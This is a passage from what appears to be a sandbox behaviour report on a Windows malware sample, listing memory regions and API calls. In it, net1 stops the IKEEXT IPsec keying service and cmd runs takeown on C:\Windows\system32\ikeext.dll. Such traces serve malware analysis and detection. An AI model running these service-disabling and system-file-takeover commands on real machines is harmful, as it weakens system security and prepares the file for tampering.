start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 971 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 972 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 973 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 974 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 975 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 976 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 41 os_tid = 0xb94 Process: id = "9" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x7eef7780" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xb90" cmd_line = "C:\\Windows\\system32\\net1 stop /y ikeext" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 977 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 978 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 979 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 980 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 981 start_va = 0xf10000 end_va = 0xf39fff entry_point = 0xf10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 982 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 983 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 984 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 985 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 986 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 987 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 988 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 989 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 990 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 991 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 992 start_va = 0x6d0f0000 end_va = 0x6d0fcfff entry_point = 0x6d0f12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 993 start_va = 0x6fce0000 end_va = 0x6fcf7fff entry_point = 0x6fce0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 994 start_va = 0x734e0000 end_va = 0x734eefff entry_point = 0x734e125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 995 start_va = 0x73a10000 end_va = 0x73a21fff entry_point = 0x73a10000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 996 start_va = 0x73e70000 end_va = 0x73e7efff entry_point = 0x73e712a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 997 start_va = 0x73e80000 end_va = 0x73e88fff entry_point = 0x73e815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 998 start_va = 0x73e90000 end_va = 0x73ea0fff entry_point = 0x73e90000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 999 start_va = 0x741a0000 end_va = 0x741a8fff entry_point = 0x741a0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1000 start_va = 0x74cd0000 end_va = 0x74cf1fff entry_point = 0x74cd0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1001 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75291319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1002 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1003 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1004 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1005 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1006 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1007 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1008 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x7696145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1009 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1010 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1011 start_va = 0x6d0e0000 end_va = 0x6d0e1fff entry_point = 0x6d0e0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 42 os_tid = 0xb9c [0047.558] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fe9c | out: lpSystemTimeAsFileTime=0x16fe9c*(dwLowDateTime=0x4d9e8d80, dwHighDateTime=0x1d34280)) [0047.558] GetCurrentProcessId () returned 0xb98 [0047.558] GetCurrentThreadId () returned 0xb9c [0047.558] GetTickCount () returned 0x13b0c [0047.558] QueryPerformanceCounter (in: lpPerformanceCount=0x16fe94 | out: lpPerformanceCount=0x16fe94*=314644358) returned 1 [0047.558] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0047.558] __set_app_type (_Type=0x1) [0047.558] __p__fmode () returned 0x768231f4 [0047.559] __p__commode () returned 0x768231fc [0047.559] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf1ffe6) returned 0x0 [0047.559] __getmainargs (in: _Argc=0xf29064, _Argv=0xf2906c, _Env=0xf29068, _DoWildCard=0, _StartInfo=0xf29024 | out: _Argc=0xf29064, _Argv=0xf2906c, _Env=0xf29068) returned 0 [0047.559] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.559] GetConsoleOutputCP () returned 0x1b5 [0047.559] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf29080 | out: lpCPInfo=0xf29080) returned 1 [0047.559] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.560] sprintf_s (in: _DstBuf=0x16fe54, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0047.560] setlocale (category=0, locale=".437") returned="English_United States.437" [0047.562] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0047.562] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0047.562] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop /y ikeext" [0047.562] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16fc20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0047.562] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0047.562] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fe24 | out: Buffer=0x16fe24*=0x17e430) returned 0x0 [0047.562] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fe24 | out: Buffer=0x16fe24*=0x17e448) returned 0x0 [0047.562] _fileno (_File=0x76822900) returned 0 [0047.562] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0047.562] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0047.562] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0047.562] _wcsicmp (_String1="config", _String2="stop") returned -16 [0047.562] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0047.562] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0047.562] _wcsicmp (_String1="file", _String2="stop") returned -13 [0047.562] _wcsicmp (_String1="files", _String2="stop") returned -13 [0047.562] _wcsicmp (_String1="group", _String2="stop") returned -12 [0047.562] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0047.562] _wcsicmp (_String1="help", _String2="stop") returned -11 [0047.562] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0047.562] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0047.562] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0047.562] _wcsicmp (_String1="session", _String2="stop") returned -15 [0047.562] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0047.562] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0047.562] _wcsicmp (_String1="share", _String2="stop") returned -12 [0047.562] _wcsicmp (_String1="start", _String2="stop") returned -14 [0047.562] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0047.562] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0047.562] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0047.562] _wcsicmp (_String1="accounts", _String2="ikeext") returned -8 [0047.562] _wcsicmp (_String1="computer", _String2="ikeext") returned -6 [0047.562] _wcsicmp (_String1="config", _String2="ikeext") returned -6 [0047.563] _wcsicmp (_String1="continue", _String2="ikeext") returned -6 [0047.563] _wcsicmp (_String1="cont", _String2="ikeext") returned -6 [0047.563] _wcsicmp (_String1="file", _String2="ikeext") returned -3 [0047.563] _wcsicmp (_String1="files", _String2="ikeext") returned -3 [0047.563] _wcsicmp (_String1="group", _String2="ikeext") returned -2 [0047.563] _wcsicmp (_String1="groups", _String2="ikeext") returned -2 [0047.563] _wcsicmp (_String1="help", _String2="ikeext") returned -1 [0047.563] _wcsicmp (_String1="helpmsg", _String2="ikeext") returned -1 [0047.563] _wcsicmp (_String1="localgroup", _String2="ikeext") returned 3 [0047.563] _wcsicmp (_String1="pause", _String2="ikeext") returned 7 [0047.563] _wcsicmp (_String1="session", _String2="ikeext") returned 10 [0047.563] _wcsicmp (_String1="sessions", _String2="ikeext") returned 10 [0047.563] _wcsicmp (_String1="sess", _String2="ikeext") returned 10 [0047.563] _wcsicmp (_String1="share", _String2="ikeext") returned 10 [0047.563] _wcsicmp (_String1="start", _String2="ikeext") returned 10 [0047.563] _wcsicmp (_String1="stats", _String2="ikeext") returned 10 [0047.563] _wcsicmp (_String1="statistics", _String2="ikeext") returned 10 [0047.563] _wcsicmp (_String1="stop", _String2="ikeext") returned 10 [0047.563] _wcsicmp (_String1="time", _String2="ikeext") returned 11 [0047.563] _wcsicmp (_String1="user", _String2="ikeext") returned 12 [0047.563] _wcsicmp (_String1="users", _String2="ikeext") returned 12 [0047.563] _wcsicmp (_String1="msg", _String2="ikeext") returned 4 [0047.563] _wcsicmp (_String1="messenger", _String2="ikeext") returned 4 [0047.563] _wcsicmp (_String1="receiver", _String2="ikeext") returned 9 [0047.563] _wcsicmp (_String1="rcv", _String2="ikeext") returned 9 [0047.563] _wcsicmp (_String1="netpopup", _String2="ikeext") returned 5 [0047.563] _wcsicmp (_String1="redirector", _String2="ikeext") returned 9 [0047.563] _wcsicmp (_String1="redir", _String2="ikeext") returned 9 [0047.563] _wcsicmp (_String1="rdr", _String2="ikeext") returned 9 [0047.563] _wcsicmp (_String1="workstation", _String2="ikeext") returned 14 [0047.563] _wcsicmp (_String1="work", _String2="ikeext") returned 14 [0047.563] _wcsicmp (_String1="wksta", _String2="ikeext") returned 14 [0047.563] _wcsicmp (_String1="prdr", _String2="ikeext") returned 7 [0047.563] _wcsicmp (_String1="devrdr", _String2="ikeext") returned -5 [0047.563] _wcsicmp (_String1="lanmanworkstation", _String2="ikeext") returned 3 [0047.563] _wcsicmp (_String1="server", _String2="ikeext") returned 10 [0047.563] _wcsicmp (_String1="svr", _String2="ikeext") returned 10 [0047.564] _wcsicmp (_String1="srv", _String2="ikeext") returned 10 [0047.564] _wcsicmp (_String1="lanmanserver", _String2="ikeext") returned 3 [0047.564] _wcsicmp (_String1="alerter", _String2="ikeext") returned -8 [0047.564] _wcsicmp (_String1="netlogon", _String2="ikeext") returned 5 [0047.564] _wcsupr (in: _String="ikeext" | out: _String="IKEEXT") returned="IKEEXT" [0047.564] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1833c0 [0047.566] GetServiceKeyNameW (in: hSCManager=0x1833c0, lpDisplayName="IKEEXT", lpServiceName=0xf2aaf0, lpcchBuffer=0x16fdc0 | out: lpServiceName="", lpcchBuffer=0x16fdc0) returned 0 [0047.567] _wcsicmp (_String1="msg", _String2="IKEEXT") returned 4 [0047.567] _wcsicmp (_String1="messenger", _String2="IKEEXT") returned 4 [0047.567] _wcsicmp (_String1="receiver", _String2="IKEEXT") returned 9 [0047.567] _wcsicmp (_String1="rcv", _String2="IKEEXT") returned 9 [0047.567] _wcsicmp (_String1="redirector", _String2="IKEEXT") returned 9 [0047.567] _wcsicmp (_String1="redir", _String2="IKEEXT") returned 9 [0047.567] _wcsicmp (_String1="rdr", _String2="IKEEXT") returned 9 [0047.567] _wcsicmp (_String1="workstation", _String2="IKEEXT") returned 14 [0047.567] _wcsicmp (_String1="work", _String2="IKEEXT") returned 14 [0047.567] _wcsicmp (_String1="wksta", _String2="IKEEXT") returned 14 [0047.567] _wcsicmp (_String1="prdr", _String2="IKEEXT") returned 7 [0047.567] _wcsicmp (_String1="devrdr", _String2="IKEEXT") returned -5 [0047.567] _wcsicmp (_String1="lanmanworkstation", _String2="IKEEXT") returned 3 [0047.567] _wcsicmp (_String1="server", _String2="IKEEXT") returned 10 [0047.567] _wcsicmp (_String1="svr", _String2="IKEEXT") returned 10 [0047.567] _wcsicmp (_String1="srv", _String2="IKEEXT") returned 10 [0047.567] _wcsicmp (_String1="lanmanserver", _String2="IKEEXT") returned 3 [0047.567] _wcsicmp (_String1="alerter", _String2="IKEEXT") returned -8 [0047.567] _wcsicmp (_String1="netlogon", _String2="IKEEXT") returned 5 [0047.567] NetServiceControl (in: servername=0x0, service="IKEEXT", opcode=0x0, arg=0x0, bufptr=0x16fdbc | out: bufptr=0x16fdbc) returned 0x0 [0047.568] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x16fd98 | out: Buffer=0x16fd98*=0x186908) returned 0x0 [0047.568] OpenServiceW (hSCManager=0x1833c0, lpServiceName="IKEEXT", dwDesiredAccess=0xc) returned 0x1834d8 [0047.568] QueryServiceStatus (in: hService=0x1834d8, lpServiceStatus=0x16fd6c | out: lpServiceStatus=0x16fd6c) returned 1 [0047.568] GetServiceDisplayNameW (in: hSCManager=0x1833c0, lpServiceName="IKEEXT", lpDisplayName=0xf31fc0, lpcchBuffer=0x16fd50 | out: lpDisplayName="IKE and AuthIP IPsec Keying Modules", lpcchBuffer=0x16fd50) returned 1 [0047.568] NetApiBufferFree (Buffer=0x186908) returned 0x0 [0047.569] CloseServiceHandle (hSCObject=0x1834d8) returned 1 [0047.569] wcscpy_s (in: _Destination=0xf2a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0047.569] LoadLibraryW (lpLibFileName="NETMSG") returned 0x6d0e0000 [0047.574] FormatMessageW (in: dwFlags=0x2800, lpSource=0x6d0e0000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0xf2b338, nSize=0x800, Arguments=0xf29dd8 | out: lpBuffer="The IKE and AuthIP IPsec Keying Modules service is not started.\r\n") returned 0x41 [0047.575] GetFileType (hFile=0xb) returned 0x2 [0047.575] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16fca0 | out: lpMode=0x16fca0) returned 1 [0047.575] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xf2b338*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x16fcc0, lpReserved=0x0 | out: lpBuffer=0xf2b338*, lpNumberOfCharsWritten=0x16fcc0*=0x41) returned 1 [0047.575] GetFileType (hFile=0xb) returned 0x2 [0047.575] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16fca0 | out: lpMode=0x16fca0) returned 1 [0047.576] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xf116cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16fcc0, lpReserved=0x0 | out: lpBuffer=0xf116cc*, lpNumberOfCharsWritten=0x16fcc0*=0x2) returned 1 [0047.576] _ultow (in: _Dest=0xdc1, _Radix=1506544 | out: _Dest=0xdc1) returned="3521" [0047.576] FormatMessageW (in: dwFlags=0x2800, lpSource=0x6d0e0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xf2b338, nSize=0x800, Arguments=0xf29dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0047.576] GetFileType (hFile=0xb) returned 0x2 [0047.576] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16fcac | out: lpMode=0x16fcac) returned 1 [0047.576] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xf2b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x16fccc, lpReserved=0x0 | out: lpBuffer=0xf2b338*, lpNumberOfCharsWritten=0x16fccc*=0x34) returned 1 [0047.576] GetFileType (hFile=0xb) returned 0x2 [0047.576] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16fcac | out: lpMode=0x16fcac) returned 1 [0047.576] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xf116cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16fccc, lpReserved=0x0 | out: lpBuffer=0xf116cc*, lpNumberOfCharsWritten=0x16fccc*=0x2) returned 1 [0047.578] NetApiBufferFree (Buffer=0x17e430) returned 0x0 [0047.578] NetApiBufferFree (Buffer=0x17e448) returned 0x0 [0047.578] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop /y ikeext" [0047.578] exit (_Code=2) Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7eef77a0" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb74" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"takeown /F C:\\Windows\\system32\\ikeext.dll\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1012 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1013 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1014 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1015 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1016 start_va = 0x49e50000 end_va = 0x49e9bfff entry_point = 0x49e5829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1017 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1018 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1019 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1020 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1021 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1024 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1025 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1026 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1027 start_va = 0x721b0000 end_va = 0x721b6fff entry_point = 0x721b1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1028 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1029 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1030 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1031 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1032 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1033 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1034 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1035 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1036 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1037 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1038 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1039 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1040 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1041 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1042 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1043 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1044 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1045 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 1046 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 43 os_tid = 0xba4 [0047.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fc74 | out: lpSystemTimeAsFileTime=0x30fc74*(dwLowDateTime=0x4daa7460, dwHighDateTime=0x1d34280)) [0047.634] GetCurrentProcessId () returned 0xba0 [0047.634] GetCurrentThreadId () returned 0xba4 [0047.634] GetTickCount () returned 0x13b5a [0047.634] QueryPerformanceCounter (in: 